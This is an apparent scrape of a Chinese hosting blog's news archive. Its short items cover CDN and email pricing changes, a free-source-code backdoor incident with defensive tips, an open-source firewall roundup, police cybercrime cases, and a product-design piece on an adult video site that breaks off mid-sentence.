免费版的其实对百度来说是一个累赘,吃力不讨好,因为免费版的只有配有三个节点,而且没有什么防御能力,很多站长接入免费版后,防不住攻击又骂百度云加速垃圾,影响了口碑,因此百度云加速取消免费版也是情理之中,只是可惜了,国内可能再无免费CDN了。目前主机吧已知的免费CDN商还有奇安信、加速乐,不过奇安信只有一个节点,而且经常故障,而加速乐则不没有防御,而且不支持HTTPS。 总之,国内好的东西已经不再免费了!有需要收费版的站长可以联系主机吧购买,我们可以按官方5折优惠购入,后续百度云加速迁移至百度智能云后,也可以联系主机吧续费,不影响使用,安全放心。 #### 免费时代过去了,QQ邮箱容量也开始收费了! QQ邮箱作为国内老牌邮箱,也是目前国内最流行的邮箱之一,除了QQ号直接当做邮箱较为方便之外,其功能性体验也很是在线。 对于经常有大文件传输需求的朋友来说,QQ邮箱绝对是个良心存在,就是可以每90天手动免费扩容一次,扩容后邮箱容量翻倍,而且当你容量用到50%之后也会自动翻倍,直至最终实现类似下图的无限容量”。 不过,羊毛”也有被薅秃的一天,不少网友发现,现在QQ邮箱的容量策略已经进行调整。 现阶段邮箱初始容量为2GB,最多可免费提供16G的邮箱容量,也就是翻倍3次,如果你需要用到更多容量,则需付费将邮箱容量和文件中转站升级至2048GB,费用为15元每月。 此外,在11月6日腾讯发布App store的QQ邮箱更新中,就添加了文件中转站扩容服务”的说明,订阅价格为连续包月每月15元,单月购买18元。 QQ邮箱是腾讯在2002年推出的邮箱服务,向用户提供安全、稳定、快速、便捷电子邮件服务的邮箱产品,已为数亿用户提供免费和增值邮箱服务。 #### 免费源码暗藏后门!帝国CMS数据库遭篡改,3招教你规避数据丢失风险 真实事件:一次下载,满盘皆输 “正在更新内容,突然被强制下线,重新登录发现数据库全被改了!”近日,一位论坛用户发帖控诉,自己从某论坛下载的“免费手游源码”竟暗藏后门,导致网站数据库配置文件(库名、密码、IP)遭恶意篡改。更痛心的是,因没有备份习惯,数据彻底丢失,只能关站删库。 该用户无奈表示:“源码在本论坛下载的,上次出问题大家怪我没改密码,这次实锤是代码自带后门!”此前,他辛苦运营的网站已积累部分收录,如今一切归零。 漏洞拆解:免费代码的“致命陷阱” 1. 后门如何植入? 攻击者常将恶意代码伪装成“功能模块”,例如: 在config.php中添加远程控制脚本; 利用伪装的“授权验证”程序,窃取服务器权限; 修改数据库连接文件,预留操控入口。 2. 攻击者做了什么? 偷家式篡改:直接修改数据库配置,切断用户控制权; 潜伏性破坏:初期正常运营,待网站有流量后突然发难; 无痕擦除:不触发常规安全警报,让恢复备份都成奢望。 3. 为什么容易中招? 贪便宜心理:迷信“免费破解版”,忽视正版授权; 盲目信任论坛:误以为热门帖子=安全可靠; 省事思维:跳过代码扫描,直接部署上线。 防御指南:三招守住数据命门 第一招:下载前“查户口” 看来源:GitHub开源项目 > 技术社区 > 无名小论坛; 查作者:是否持续更新?有无官方认证标识? 比哈希:对照官方发布的MD5/SHA值,揪出篡改文件。 第二招:部署时“上保险” 沙盒测试:用Docker搭建隔离环境试运行; 敏感文件监控:对/config、/database目录设置“只读”权限; 关后门:删除源码中非必要的远程调用接口。 第三招:运营后“留后路” 321备份法则:3份备份,2种介质,1份离线; 实时告警:用云监控工具(如阿里云云监控)盯紧数据库变更; 权限隔离:数据库账户禁用ROOT权限,按需分配读写许可。 用户亲历的3个灵魂拷问 “免费代码能商用吗?”→ 多数暗藏法律风险!尤其手游源码可能涉侵权素材,当心律师函警告。 “代码扫不出病毒就安全?”→ 错!后门未必是病毒,人工审查关键代码才是王道。 “小网站也会被盯上?”→ 攻击者专挑“小白站长”,批量种马薅数据,你的用户信息可能正在暗网打折卖! 说人话总结 用论坛免费源码就像吃陌生人给的糖果——可能很甜,但更可能毒发身亡。 要资源?去官网! 图省事?学检测! 怕丢数据?勤备份!记住:天上掉的“馅饼”,多半是黑客撒的“鱼饵”。 #### 免费申请一年.CN.中国域名来了 去年有说过,国内未来两年会推出免费CN、中国域名,没想到这么快就有公司推出来了。 西部数码已经推出免费CN、中国域名了。 活动规则:1. 本活动只限中小企业用户参加(不含个体工商户)。2. 参加活动的中小企业应符合国家统计局发布的《统计上大中小微型企业划分办法(2017)》中的大中小微型企业划分标准。最终以cnnic审核结果为准。3. 活动期间每个中小企业只能参与1次,只能免费注册1个国家顶级域名(.CN或.中国),免费期1年,到期后可以市场价格续费。成功注册的国家顶级域名在免费期内不可过户。4.本活动中,CNNIC将共计提供100万个免费注册的国家顶级域名。5. 通过本活动成功注册的国家顶级域名,均可申请免费使用国家顶级域名隐私保护服务1年。6. 成功注册国家顶级域名的中小企业可以优惠价格向联合开展活动的注册服务机构选择多种互联网应用服务和产品。 有兴趣的同学可以去看下:https://www.west.cn/paas/cnfree/ #### 免费网盘不好做 奶牛快传2月26日起暂停免费用户网盘 2月24日 消息:今日,大文件临时传输软件奶牛快传发布公告称,因业务调整,自2021 年 2 月 26 日起免费注册用户网盘内的文件将无法下载,同时取消转存服务,仅保留传输历史。用户可在2021年2月26日0点前妥善处理网盘内文件或升级会员保留网盘功能。 2021年3月12日0点,免费注册用户存储在网盘内的文件将统一进行删除处理,不作保留。 此外,奶牛快传还表示,PLUS会员已下线,将不再进行售卖,原PLUS会员保留,使用至会员到期结束。原PLUS / PRO 用户网盘,回收站保留30天,会员到期后60天,如不续费,届时奶牛快传将统一进行删除处理,不作保留。 据悉,奶牛快传创建于2018年,是一款无需注册即可使用的大文件临时传输服务,未注册用户支持最大2GB 文件,72小时(3天)保存时效。支持微信与支付宝登录,登录免费最大可传输2GB 文件,168小时(7天)保存时效,不限速,能在不同的设备间进行文件传送功能。 可以看出,奶牛快传这次关闭免费用户是非常紧急的,24号发的公告,26号就不让用了,如果有用到他们家网盘的,可悲剧了。 #### 免费网页统计工具统计鸟卖了 之前有说过统计鸟凉了,今天有站长反馈可以打开了,而且重新备案了。 主机帮查了下,确实可以打开了 不过备案已经变了,由广西备案变成云南备案了。 也就是说所有公司变了,看来有人猜测统计卖了是真的了,而且原先统计鸟的论坛也打不开了,看来新公司是不打算做论坛了。 有站长反馈新公司的注册资金只有1万,所以想用统计鸟的同学,还是谨慎点好。 #### 免费防火墙系统哪个好?10大推荐榜单与适用场景全解析 以下是当前主流的开源防火墙系统,综合了多个来源的信息,涵盖不同应用场景和功能特性: 1. iptables/nftables 特点:作为Linux内核自带的传统防火墙工具,iptables通过命令行管理网络流量规则,而nftables是其现代替代品,整合了IPv4/IPv6/ARP等协议支持,性能更优且规则配置更简洁。 适用场景:适合需要深度定制规则的系统管理员或服务器环境。 2. UFW(Uncomplicated Firewall) 特点:Ubuntu/Debian的默认防火墙工具,提供简单命令行和图形界面(GUFW),支持IPv6、扩展日志和动态规则管理,降低iptables的复杂度。 适用场景:个人用户或新手管理员快速配置基础防护。 3. pfSense 特点:基于FreeBSD的功能全面的防火墙发行版,支持Web管理、VPN、负载均衡、流量整形等高级功能,社区活跃且文档丰富。 适用场景:企业级网络、边缘防火墙或复杂路由需求。 4. OPNsense 特点:pfSense的分支项目,专注于安全性和现代界面,提供每周安全更新、深度数据包检测(IDS/IPS)和OpenVPN支持,适合替代商业防火墙。 适用场景:需要高安全性和易用性的中小型企业。 5. IPFire 特点:模块化的Linux防火墙发行版,内置入侵检测(IDS)、内容过滤和VPN网关功能,支持虚拟化环境(KVM/Xen),适合家庭或小型办公网络。 适用场景:多网段隔离(如LAN/DMZ)和代理服务器需求。 6. Shorewall 特点:基于Netfilter的高效配置工具,简化复杂iptables规则,支持多ISP、端口转发和Webmin管理界面,适合网关和路由器应用。 适用场景:企业级网络集中管理或需要多链路负载均衡的环境。 7. ConfigServer Security Firewall(CSF) 特点:跨平台防火墙脚本,集成入侵检测、登录失败监控和邮件告警,支持与cPanel/Webmin等控制面板无缝协作。 适用场景:服务器安全加固,尤其是虚拟化或托管环境。 8. Smoothwall/Smoothwall Express 特点:提供Web管理界面(WAM),支持实时内容过滤、HTTPS拦截和流量统计,适合将旧硬件改造为防火墙设备。 适用场景:小型企业或教育机构的网络监控与访问控制。 9. Endian Firewall 特点:基于IPCop发展而来,集成双向防火墙、Snort入侵防御和反病毒功能,支持VPN和URL黑名单,适合中小企业。 适用场景:需要统一威胁管理(UTM)的综合安全方案。 10. VyOS 特点:基于Debian的开源路由平台,支持高级路由协议(如BGP/OSPF)、防火墙和VPN功能,适用于物理或虚拟环境。 适用场景:复杂网络架构或需要软件定义网络(SDN)的场景。 其他值得关注的选项 ClearOS:基于CentOS的网关服务器,提供防病毒、带宽管理等模块,适合中小型企业。 Untangle NG:模块化设计,通过免费或付费应用扩展功能(如广告拦截、Web过滤)。 OpenWrt:嵌入式设备防火墙,支持LuCI界面和自定义软件包,适合家庭路由器改造。 选择建议 个人/新手:优先考虑UFW或IPFire的图形界面。 企业级需求:pfSense、OPNsense或VyOS提供商业级功能。 服务器防护:iptables/nftables或CSF适合深度定制。 更多详情可参考相关项目官网或上述来源网页。 #### 入驻1688服务市场要求企业/个体工商户啦 12月2日 消息:日前,1688服务市场发布了关于新增服务商入驻身份要求调整的通知。 根据通知,自2021年12月8日起,1688服务市场将对新入驻服务商(包括但不限于设计师、ISV、ISP)增加身份门槛要求,即服务商应满足企业/个体工商户的身份要求,并通过1688服务市场的企业/个体工商户信息核验。 同时,官方鼓励已入驻服务市场的个人服务商尽快升级为企业/个体工商户。 具体关于个转企流程可点击这里阅读。 #### 全国公安机关开展专项行动:清理整治动态 IP 代理服务乱象 5 月 21 日消息,IP 就是 Internet Protocol(网际互连协议)的缩写,是 TCP / IP 体系中的网络层协议,主要作用是实现大规模网络的互联互通。而动态 IP 是指当你在上网时,电信运营商会随机分配一个 IP 地址给你。近年来,随着互联网络技术的飞速发展,又开始出现一种动态 IP 代理服务,由此带来许多问题。 动态 IP 代理服务是一种能够变换境内不同地区登录 IP 地址的互联网接入服务。大量不法分子利用此服务,令短时间内快速、大量地切换 IP 地址成为可能,从而使“网络水军”、网络诈骗、网络赌博、传播淫秽色情等违法犯罪行为更加隐蔽,以此逃避公安机关的打击,侵犯人民群众合法权益! 据公安部网安局报道,针对网上此类突出违法乱象,公安部部署“净网”专项行动,组织全国公安机关开展动态 IP 代理服务集中整治,取得了丰硕成果,有力净化了网络环境。 专项行动重拳打击了 IP 跳转技术服务商核心环节和基础电信运营商根源环节,以“釜底抽薪”之行动,铲除诸多网络违法犯罪赖以生存的基础资源,全面挤压网络违法犯罪空间。 多地网安部门按照公安部统一部署,积极开展相关行动。 今年以来,江西网安部门结合此专项内容,办理行政案件 14 起,依法查处 6 家县级运营商和 8 家 IP 跳转技术服务商,约谈 4 家市级运营商相关负责人,取缔 6 个“作坊式”机房,查封扣存服务器等设备 400 余台,关停违法违规宽带账号 1300 余个。 网警提示 根据《中华人民共和国网络安全法》《中华人民共和国刑法》相关规定,网络运营者为用户办理网络接入等入网手续,应当要求用户提供真实身份信息;明知他人利用信息网络实施犯罪,仍为其犯罪提供互联网接入等技术支持的涉嫌帮助信息网络犯罪活动罪。 #### 全国政府网站将统一.gov.cn域名后缀 不得擅自转让域名 9月7日 消息:    为加强网络安全建设的决策部署,促进政府网站健康有序发展,国务院办公厅于 9 月 6 日发布了关于加强政府网站域名管理的通知。根据通知,政府网站主办单位要按照“谁开设、谁申请、谁使用、谁负责”的原则管理政府网站域名。一个政府网站原则上只注册一个中文域名和一个英文域名,如已有多个符合要求的域名,应明确主域名。不得将已注册的政府网站域名擅自转给其他单位或个人使用,闲置的域名要及时注销。值得注意的是,通知还要求,政府网站应使用以“.gov.cn”为后缀的英文域名和“.政务”为后缀的中文域名,不得使用其他后缀的域名。不承担行政职能的事业单位原则上不得使用以“.gov.cn”为后缀的英文域名。根据要求,县级以上地方各级人民政府和国务院部门开设的政府门户网站,要使用“www.□□□.gov.cn”结构的英文域名,其中□□□为本地区、本部门名称拼音或英文对应的字符串(下同)。省级、地市级政府部门开设的网站,要使用本级人民政府门户网站的下级英文域名,结构为“○○○.□□□.gov.cn”,其中○○○为本部门名称拼音或英文对应的字符串(下同);实行垂直管理的国务院部门的基层单位网站,要使用国务院部门门户网站的下级域名,结构为“○○○.□□□.gov.cn”。政府网站的中文域名结构应为“△△△.政务”,其中△△△为网站主办单位的中文机构全称或规范化简称(下同)。政府网站各栏目、频道、专题、业务系统等原则上使用同一级域名,其中政府门户网站的栏目等使用“www.□□□.gov.cn/…/…”和“△△△.政务/…/…”结构的域名;部门网站(包括省级、地市级政府部门,以及实行垂直管理的国务院部门的基层单位网站)的栏目等使用“○○○.□□□.gov.cn/…/…”和“△△△.政务/…/…”结构的域名。通知原文内容点击这里查看。 #### 全国最大色情直播APP平台被“端”:会员超350万涉案金额超2. 5 亿元 【环球网科技 记者 林迪】 9 月 19 日,记者从中国扫黄打非网了解到,浙江嘉兴警方与全国“扫黄打非”办公室、公安部合力破获了特大跨境网络传播淫秽物品牟利案,据警方称,这是迄今全国最大色情直播聚合平台,涉案金额超2. 5 亿,涉案手机APP平台已发展代理1. 6 万余名,观看的所谓会员 350 多万。据报道, 2018 年 3 月,浙江嘉兴市公安局网警部门巡查中发现,有人在举报了一款名为“Max”的手机App,付钱后成为会员,买主就会获得一串卡密,输入密码后便可进入一个平台。该平台集合了 110 个色情淫秽直播网站,实行会员制,拥有代理1. 6 万余名,会员 350 多万,涉案资金超2. 5 亿元,存储1. 8 万余部淫秽色情视频。4 月 12 日,根据前期侦查的情况,专案组出动 300 多名警力分赴福建、上海、广东等 20 个省市,对首批已查明身份平台代理人员开展集中收网行动,采取了刑事强制措施 144 人。首次收网后,该平台仍不知收手,继续大肆发展代理,并不断在微信、QQ、微博等社交软件中推广淫秽色情APP,同时与赌博团伙勾结,借助色情流量推广赌博网站。8 月 24 日,在公安部、浙江省公安厅展开收网,在柬埔寨抓获 18 名犯罪嫌疑人,现已押送回国。公安机关表示,该案系目前全国范围内,公安机关已破获的代理人数最多、会员最多,也系国内最大的涉黄直播聚合平台。以下为公告全文:2018 年 3 月,浙江省嘉兴市公安机关在工作中发现,一款名为“Max”的手机APP软件,聚合 110 多个淫秽色情直播平台,存储数十万部淫秽色情视频,通过层层发展代理、招揽用户购买会员卡密(类似于手机充值卡)的方式非法牟利。会员在直播模块中可以观看上百个淫秽色情平台的直播表演,也可以点播淫秽色情视频,案件涉及人员众多,涉案金额巨大。 4 月 5 日,嘉兴市公安局成立了由市局领导任组长,网警支队、南湖区、经济技术开发区公安分局组成的专案组,省公安厅网安总队调派各方面资源全力支持。在侦办过程中,阿里巴巴安全部给予了大力支持。4 月 12 日,根据前期侦查的情况,专案组出动 300 多名警力分赴福建、上海、广东等 20 个省市,对首批已查明身份平台代理人员开展集中收网行动,共抓获包括该平台国内最大一级代理谢某建(男, 23 岁,福建漳州人)在内的犯罪嫌疑人 200 余名,其中,采取了刑事强制措施 144 人。首次收网后,该平台仍不知收手,继续大肆发展代理,并不断在微信、QQ、微博等社交软件中推广淫秽色情APP,同时与赌博团伙勾结,借助色情流量推广赌博网站。按照“全链条打击”的要求,在公安部网安局高度重视和大力支持下,专案组继续对案件进行深挖,进一步发现了平台的组织者和管理者在柬埔寨西哈努克港,并做好了开展国际执法合作、实施出境抓捕的有关准备。 6 月 27 日,全国“扫黄打非”办公室联合公安部将该案列为“净网2018”专项行动挂牌督办案件。8 月 13 日,公安部、省、市、区公安机关联合选派精干力量,赴柬埔寨开展缉捕遣返工作。经过与柬埔寨警方多次协调对接, 8 月 24 日,工作组会同柬埔寨警方对嫌疑人藏匿的住所开展抓捕。一举抓获涉案平台负责人陈某(男, 37 岁,福建厦门人)等 18 名犯罪嫌疑人,成功打掉这一盘踞境外,利用网络传播淫秽物品牟利的特大犯罪团伙。经查,自 2017 年 8 月份以来,犯罪嫌疑人陈某伙同周某(男, 37 岁,福建厦门人)、郭某(男, 32 岁,福建厦门人)等人,通过在境外架设服务器,自行开发APP接入淫秽色情直播源等方式招揽会员,传播淫秽视频非法牟利的犯罪事实。陈某等主要犯罪嫌疑人长期藏匿境外柬埔寨等地,通过操控境内总代理,无限发展一级代理、二级代理、三级代理等,层层加价,分销卡密,恶意传播淫秽色情APP,造成恶劣社会影响。其中,平台出售给总代理的卡密价格约 6 到 7 元,总代理转手卖给一级代理,一级代理转手卖给二级代理等的价格则可达到 20 到 40 元不等。截止陈某等人落网,该手机APP平台已发展代理1. 6 万余名,观看的所谓会员 350 多万,涉案资金2. 5 亿,是目前全国范围内公安机关已破获的最大色情直播聚合平台。本案抓获了该犯罪集团的组织者,也打击了涉及 20 多个省市区人员的全链条组织架构,是在公安部、省公安厅领导下,四级公安机关参与侦办的跨境传播网络淫秽物品案。本案的成功侦破,示范效应强,实现了“追源头、摧平台、断链条”的目标,严厉打击了网络传播淫秽色情信息违法犯罪活动,有效净化了网络空间。 #### 全国首个官方(反淘宝)微信商城平台正式上线了 微信内部的「购物」大入口终于开放。 1 月 4 日,京东和美丽联合集团共同发布公告,宣布双方将建立合资企业,专门用于运营微信中的电商平台。 根据官方的新闻稿和 PingWest 品玩了解到的信息,总结下来,新公司要干这么几件事: 在微信内部建立一个社交电商平台,允许第三方中小卖家在平台上开微店,就像是一个微信里的「小淘宝」; 这个平台通过微信「发现」栏目中「购物」进入,这个一直专属京东的入口将为所有第三方中小卖家所共享; 合资公司还会给在上面开店的卖家提供除流量外的平台支持,比如小程序开发,电商软件开放商对接,以及京东的基础物流仓储能力(与 POP3 类似)等等。 加上腾讯与京东、美丽联合都有投资关系,这个平台相当于微信官方电商平台,专门针对中小卖家,是个 C2C 平台。 新公司计划,平台招商工作在 2018 年春节前就会开始。所以,如果微店微商们想赶第一波红利,现在正是入驻的好时候。 腾讯已经投资的主要 B2C 网站有京东和唯品会,C2C 平台则有美丽联合集团(蘑菇街+美丽说),这是微信的电商官方军;除此之外,还有大量独立开发微店后台、或者利用微信的社交关系卖货的微商,这些是在野部队。 而这个动作,相当于把这些在野部队也一并收割到了官方旗下,统一导流,统一平台式管理。 更进一步来看,阿里系之外的几家大型电商平台聚拢在腾讯周围建立起的这个「反阿里巴巴」联盟,这次的合资公司,是要把除了这些头部公司之外的长尾部分——微店微商们也汇集到一起去。 结合近年来腾讯在电商领域的一些主要动作,这个联盟其实是在各个因素在过去一年中综合发展的结果: 将电商业务交给京东后,腾讯用三年时间入股或投资了多家电商和本地生活平台,把阿里系外有点成绩的公司几乎一网打尽; 小程序经过一年多时间的调试,在封闭的微信内部单独开辟了一个可以承载复杂功能的运行环境,这是以前订阅号和功能号都无法做到的; 微信内部的广告、游戏等商业设施臻于成熟,只有电商还停留在给京东等少数几家公司开个入口导流的「原始状态」。 尤其是小程序能力的完善——现在你打开「蘑菇街」、「转转」和「拼多多」这些电商平台的官方小程序,会发现它们的功能和体验已经完全可以跟原生 App 媲美。 用户可以在同一个商家的不同小程序之间无缝跳转,直接调用微信的用户系统、IM 和支付功能。 另外还有一点值得注意:当初微信推广功能号以「招商银行」等作为样板,那承担小程序电商样板功能的,正是本次合资公司的主角之一——美丽联合集团。 根据 PingWest 品玩了解到的情况,今年 5 月份,蘑菇街的一支团队正式进入微信所在的 TIT 创意园,开始小程序开发。6 月 23 号,「蘑菇街女装精选」小程序第一版上线,今年「双十一」和「双十二」,微信成了蘑菇街除自有渠道之外的另一大流量来源。 美丽联合集团官方披露,单件商品经过微信分享,最高有近 11 万人打开了分享链接;小程序内有 44% 的成交用户来自微信好友分享的商品。整体来看,双十一期间,蘑菇街小程序新客成交占比是蘑菇街 App 的 4.2 倍。 微信内部的社交电商流量和小程序的交易承载能力可见一斑。 不久前,美丽联合集团 CEO 陈琪曾在一次闭门分享中说,微信内部现在就像是一个操作系统,在微信里做商业的基础架构越来越成熟。 他甚至直接定义:「移动互联网没有下半场,未来是微信互联网」 #### 全国首个比特币勒索病毒制作者落网 非法获利500余万元 据荔枝新闻报道,近日,江苏南通警方成功抓获全国首个比特币勒索病毒制作者。犯罪嫌疑人巨某先后向400多家网站和计算机系统植入敲诈勒索病毒。截止案发,巨某已作案百余起,非法获利的比特币折合人民币500余万元。 据警方表示,该犯罪嫌疑人从2017年就开始制作勒索病毒,巨某自幼喜好钻研计算机知识,此前因炒股亏损300多万便铤而走险开始编写病毒程序。为逃避公安机关的追查,他索要难以追查的比特币作为赎金。 其中,一家的苏州上市公司因被破坏数据,生产系统已经无法正常运行,直接停工三天,造成巨大损失。 目前,3名涉案犯罪嫌疑人均因涉嫌敲诈勒索罪被执行逮捕。 #### 全国首例百科数据侵权案宣判 百度百科胜诉获赔800万元 5月21日,百度百科官方公众号披露,北京海淀法院审结全国首例涉及百科词条数据的竞争纠纷案。某网络公司因非法抓取60余万条百度百科词条内容,被法院认定构成不正当竞争,终审判赔800万元。此案作为国内百科领域数据权益保护的标志性案件,引发行业广泛关注。 案件核心争议:60万词条数据归属权 百度网讯公司及其技术支持方(以下简称原告)指控某网络技术公司(被告)通过技术手段批量抓取其平台60余万条百科词条,伪造用户信息发布于其运营的“乙百科”网站。原告指出,这些词条经多年运营投入形成内容聚合价值,被告行为已实质性替代原平台功能,造成重大经济损失。 被告辩称百科词条属用户生成内容,原告不享有独占权益,且否认存在侵权行为。 法院判决:数据集合权益受法律保护 法院审理认为,百度百科通过系统化收集、编排与管理,将零散用户创作内容整合为具有传播价值的数据集合,形成受《反不正当竞争法》保护的竞争性权益。被告未经许可大规模抓取内容,并伪装用户发布以规避监管,其行为具有以下违法特征: 技术侵权:非法抓取技术直接破坏百度数据资源; 商业替代:涉案60万词条占乙百科总量90%,构成实质性内容替代; 扰乱秩序:损害原创平台积极性,长远影响公众信息质量。 最终,法院判决被告立即停止侵权行为,公开致歉,并赔偿原告经济损失500万元及合理开支300万元。二审维持原判,目前判决已生效。 行业警示:数据资产保护进入强监管时代 本案首次明确百科类平台数据集合的法定权益边界,为同类纠纷提供重要判例参考。法院强调,企业通过合法经营形成的数据资源若遭不当利用,司法将坚决维护公平竞争秩序。随着数字经济深化,企业数据合规管理与维权意识亟待提升,避免触碰法律红线。 #### 全国首起暗网平台案告破 注册会员超6万人 5月8日 消息:据荔枝新闻报道,近日,无锡警方破获了一起利用暗网传播淫秽内容的案件,并成功打掉了一个搭建在暗网里的违法网站。 去年7月,无锡警方发现一网站充斥着色情信息及淫秽内容,该网站注册会员达6万多人。随后,无锡市网安支队民警通过技术手段对暗网展开侦查,以暗网和外网相结合的方式,最后锁定了嫌疑人所处的位置。最后警方在成功抓获嫌疑人王某。 嫌疑人王某交代,自己毕业于软件工程专业,2017年开始在暗网上架设淫秽网站的论坛。自己出于技术爱好,对暗网比较感兴趣,开始深入研究,从中牟利,并慢慢转型成为交友平台。 警方勘验取证,该网站用户达60506个,淫秽色情视频51部,色情图片214张。 2020年1月8日,犯罪嫌疑人王某被无锡市锡山区人民法院判处有期徒刑。 #### 全新图像编码格式JPEG XL发布,将与HEIF、WebP格式抗衡 7月19日消息:联合图像专家小组(JPEG,Joint Photographic Experts Group)日前宣布,将在今年底前针对JPEG XL图像编码格式进行升级,声称可加入HDR等现代化常见视频内容,并且加入更有效压缩比例,同时也兼容现有JPEG图像编码格式。 图片来自 jpeg 据介绍,JPEG XL是在2019年8月于比利时布鲁塞尔举办的第84次JPEG会议上提出标准草案,将以ISO/IEC1818作为图像编码系统,此次提出更新预计加入HDR、广色域及高动态范围图像格式,同时也支持动图、透明或半透明显示,以及包含图层、缩略图等内容,并且支援无损及渐进式压缩编码,另外也支持360度图像内容,同时支持渐进式网页使用需求。 此外,JPEG XL也采用更高无损压缩率(约从20:1至50:1),让图像内容可以还原成相同内容的JPEG图像档案,借此维持其向下兼容特性,让现有浏览器、文件都能顺利开启使用,无须通过额外硬件设备辅助解压,或是进行压缩。 预计JPEG XL将与动态影像专家小组(MPEG,Moving Picture Experts Group)提出的HEIF (高效率图档格式,High Efficiency Image File Format),以及Google提出的WebP等图像格式抗衡。 #### 全新百度云防护套餐上线! 经过年初几个月的处理,由百度云加速改版过来的全新百度防护套餐已经上线!目前套餐配置如下: 专业版 DDOS防护:平台共享TB级DDOS防御 CC攻击防护: 支持智能防护+自定义防护 WEB应用防火墙: 智能防护 WAF自定义规则:20条 动静态智能加速:支持 自定义缓存策略:支持 HTTPS:支持 IPV6:支持 防护域名额度:1个(5个子域名,支持泛解析) 泛域名解析:支持 套餐每月流量:3TB(超量可单独购买流量包) 价格:299元/月 2400元/年 商业版 DDOS防护:平台共享TB级DDOS防御 CC攻击防护:支持智能防护+自定义防护 WEB应用防火墙:智能防护 WAF自定义规则:20条 动静态智能加速:支持 自定义缓存策略:支持 HTTPS:支持 IPV6:支持 防护域名额度:1个(5个子域名,支持泛解析) 泛域名解析:支持 套餐每月流量:10TB(超量可单独购买流量包) 价格:778元/月 7780元/年 企业版 DDOS防护:平台共享TB级DDOS防御 CC攻击防护:支持智能防护+自定义防护 WEB应用防火墙:智能防御 WAF自定义规则:20条 Bot防护:支持 威胁情报: 支持设备情报+IP情报 动静态智能加速:支持 自定义缓存策略:支持 HTTPS:支持 IPV6:支持 防护域名额度:1个(10个子域名,支持泛解析) 泛域名解析:支持 套餐每月流量:30TB(超量可单独购买流量包) 价格:2999元/月 29990/年 跟旧版本相比,新版本的CC攻击防护支持智能防护和自定义防护,针对CC攻击防护有不错的效果。 同时WEB应用防火墙做了升级,主机吧查看防御效果非常不错,而企业支持了Bot防护和设备情报+IP情报功能,bot防护是主要针对互联网上的扫描机器人的,开启可以有效拦截一些非搜索引擎的爬虫,阻止像火车头这样的工具抓取你网站的内容。 新版云防护的套餐流量也相当高,主机吧看了下,这个流量应该是目前大厂里套餐自带流量最高的,总得来说,云防护是非常不错的集成智能加速、安全防护的高防CDN产品,有需要的小伙伴欢迎滴滴我。 #### 全景网恢复访问 不合规图片已全部下架 4月17日 消息:目前,全景网络旗下网站全景网已可以正常打开,不过网站内前国家领导人、国旗、国徽、党旗和部分企业、企业家等图片已全部下架,均显示“没有检索到图片,请重新搜索关键词”。 4月12日,视觉中国为“人类首张黑洞照片”注明版权一事在网上持续发酵,而另一个同类网站,在新三板挂牌的公众公司全景网络旗下的“全景”平台,也被曝出将国旗、党旗、党徽图案、多位前国家领导人的肖像等图片进行售卖。 随后,全景网已无法访问。 不过舆论的中心视觉中国目前还在关闭中 #### 全球60亿人有8000万人每天访问 这家“啪啪啪”小电影网站要逆天了… 来源:三节课(微信:sanjieke01) 本文作者王珂,前产品狗,三节课产品经理学院负责人,不定期会研究各种国内外热门产品。 本文充分证明了,哪怕是在再Low再见不得光的行业,只有你拥有足够的认真和创意,都能把一个产品的设计和运营玩出花来…… 俗话说,“性”是第一生产力。这一点在互联网世界中也一再被验证,典型容易让大家在第一时间想到的,就有在营销界将创意发挥到极致的杜蕾斯,还有早已成为传说的1024。 然而,最近一段时间,一家来自于大洋彼岸的加拿大的叫做Pornhub的成人网站则在互联网产品、运营圈内多次被人提起——虽然身为看起来上不得台面的为用户提供海量“啪啪啪”小电影的网站,但Pornhub上,绝没有满屏飞的弹窗和广告,也丝毫不会让人觉得“Low”,恰恰相反,他们在产品设计、交互体验、运营和营销等各方面的举措,高大上得让人惊讶,可以说简直是亮瞎了无数产品狗的狗眼!! 不妨简单为你普及一下这个网站的背景, 2007 年Pornhub成立于加拿大蒙特利尔,之后成为了全球最大的ugc成人小电影分享平台。这么说可能你不太有感受,我们来看一组 2017 年的数据: 全年pv285 亿;alexa稳定排行 30 名。排在后面的有支付宝、ebay、Linkedin等巨头…… 日均独立访客 8100 万,要知道,整个知乎的注册用户数也就是 1 亿出点头的样子……; 全年视频上传总量可以装满世界上所有正在运行的iPhone手机…... 换句话说,这里面成人小电影的容量之多,你绕地球几圈也看不一定能看完。 那么,为什么这家网站可以做到这么牛逼呢? 身为一个拥有多年经验的产品狗,接下来,我想要带你从几个角度来具体了解一下Pornhub这家成人小电影网站,到底都在哪些地方做出了让用户惊艳的举措。 一、最懂用户的色情网站 从产品角度来看,Pornhub对于场景和需求的把握,以及在一些交互细节上的微创新值得每一个产品狗深思和学习,我们来看几个例子: 1、播放进度条显示热度 Pornhub的每一个视频,其播放进度条上会有一个热度分布图,热度的高低意味着某个时段受欢迎的程度。 这样的功能设计简直令人叹服——毕竟,对于观看“啪啪啪”小电影的用户,都是带着特定目的来的,大家都想直奔重点。有了这个设计,大家尽可速战速决,节省了很多用户的时间,大大提高了用户的使用效率。 2、关于“热度视频”的定义策略 像很多视频网站一样,Pornhub上也有许多“热门视频”。但,不一样的是,它对视频的“热度”是这样定义的—— 看到这里,我再也按捺不住我如滔滔江水般延绵不绝的膜拜之意——这一波对于用户需求的洞察堪称绝妙,拿捏到位!! 因为你懂的,人们在“啪啪啪”小电影的观看场景下,往往会止步于最好最刺激最吸引你的视频面前——遇到你以后,我再也没考虑过别人。 3、视障用户的专用版 Pornhub对用户的在意和关照也绝对是极有诚意的——他们专门开发了针对视障用户专用的版本,支持文本放大、自定义颜色对比、巨大的按钮和清晰的导航等功能,甚至可以使用自定义快捷键。 这些人性化的设置,进一步扩大了网站的受众面积,让你即便天生视力不好,即便年老体衰,也仍然可以轻松愉悦的在Pornhub观看你喜欢的小电影。 我给Pornhub脑补了一句中文Slogan——“只要你想,我们一定让你看到。” 4、高大上机器学习和推荐策略 下面要讲的这个,真的是高高高高高科技了。 去年,Pornhub把站内数据库的全部视频逐帧扫描,做了一套机器学习的模型,可以根据演员、发色、场景、视频中的体位等打上各种标签。 要知道,如果你面前有着海量的小电影,你怎么能够快速找到自己心仪的片子,其实是个困扰很多用户的问题。 然而,Pornhub的这波操作过后,其实它已经可以做到像今日头条一样精准的根据你的兴趣爱好——喜欢何种肤色、何种面容、何种场景、何种体位……来为你自动推送你喜欢看到的内容了,让你再也无需为“看什么”而操心。 也许,在一个个孤枕难眠的夜晚,Pornhub比你更懂你。 5、智能硬件的应用 2016 